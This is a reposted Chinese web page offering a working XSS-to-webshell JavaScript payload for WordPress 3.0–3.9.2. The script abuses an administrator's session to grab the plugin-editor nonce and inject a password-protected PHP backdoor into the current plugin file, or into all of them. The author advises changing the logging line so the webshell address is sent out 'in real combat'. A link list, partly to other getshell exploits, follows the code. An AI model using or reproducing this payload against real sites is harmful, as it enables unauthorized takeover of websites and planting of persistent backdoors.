wordpress 3.0-3.9.2 XSS Getshell Payload(可Getshell当前模板也可以是全部插件模板)
来源:互联网 发布:大数据hadoop面试题 编辑:程序博客网 时间:2024/05/31 04:03
0x_Jin
如果实战用记得把 console.lnfo 那一行该为发送喔。。。
密码:fuckxssQ这个getshell js 有getshell当前模板跟getshell全部模板的功能
默认是getshell当前模板 StartGetshell = 0
如果要getshell全部插件模板 把 StartGetshell的值改为1 即可
/*0x_Jin WordPress Getshell*/var a = location.href.split('/');var file = "";var xurl = location.href.replace(a[a.length-1],"plugin-editor.php");var file2 = [];var StartGetshell = 0;var shellcode = '<?php\n$k="ass"."ert"; $k(${"_PO"."ST"} ["fuckxssQ"]);';jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {},}).done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); Tmpcode = o.text().replace('<?php',shellcode); }) temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }) temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }) if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ var temp = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); console.info('Webshell:'+location.href.replace(temp,"wp-content/plugins/"+file)); return; }) } if(StartGetshell){ for(var i=0;i<file2.length;i++){ var filename = file2[i]; if(file2[i]!=file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'plugin': file2[i],'Submit':'Select'}, }) .done(function(data) { var NewCode = ""; var NewToken= ""; var Getshell=jQuery(data); Getshell.find("textarea#newcontent").each(function(i,o){ var o=jQuery(o); NewCode = o.text().replace('<?php',shellcode); }) Getshell.find("input#_wpnonce").each(function(i,o){ var o=jQuery(o); NewToken = o.attr('value'); }) if(NewCode&&NewToken){ console.log("1"+filename); jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'} }) .done(function(){ var temp = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); console.info('Webshell:'+location.href.replace(temp,"wp-content/plugins/"+filename)); return; }) } }) } } }}).fail(function() { console.log("error");}).always(function() { return;});
效果图:
0 0
- wordpress 3.0-3.9.2 XSS Getshell Payload(可Getshell当前模板也可以是全部插件模板)
- XSS也能getshell
- dedecms xss oday通杀所有版本 可getshell
- dedecms xss 0day通杀所有版本 可getshell
- Joomla远程上传漏洞 可直接getshell
- metinfo多个漏洞(可getshell)
- [python]emlog相册插件getshell exploit
- wordpress模板插件收集
- ES6中的模板字符串和新XSS Payload
- MetInfo 3.0 PHP代码注入漏洞(getshell)
- 某信息技术考试系统编辑器漏洞可getshell
- dedecms最新版本存在远程包含漏洞--可getshell
- 74cms某漏洞可导致普通用户getshell
- Shopex 后台getshell
- phpcms V9 getshell exp
- phpcms V9 getshell exp
- shopex前台getshell漏洞!
- 通达oa getshell分析
- poj1611
- 【BZOJ】【P1923】【Sdoi2010】【外星千足虫】【题解】【高斯消元】
- void类型及void指针
- 数据结构-线性结构-队列
- 栅格数据挑选子区域
- wordpress 3.0-3.9.2 XSS Getshell Payload(可Getshell当前模板也可以是全部插件模板)
- opencv编程
- QT的事件机制
- rt5350 Android平板播放
- 【Android界面实现】Starting an Activity(Activity生命周期金字塔模型)
- 设计模式【桥接模式】
- 【习题3-7】 UVA - 1368 DNA Consensus String
- matlab中的图像几何操作
- VS 2013 调试程序,拒绝访问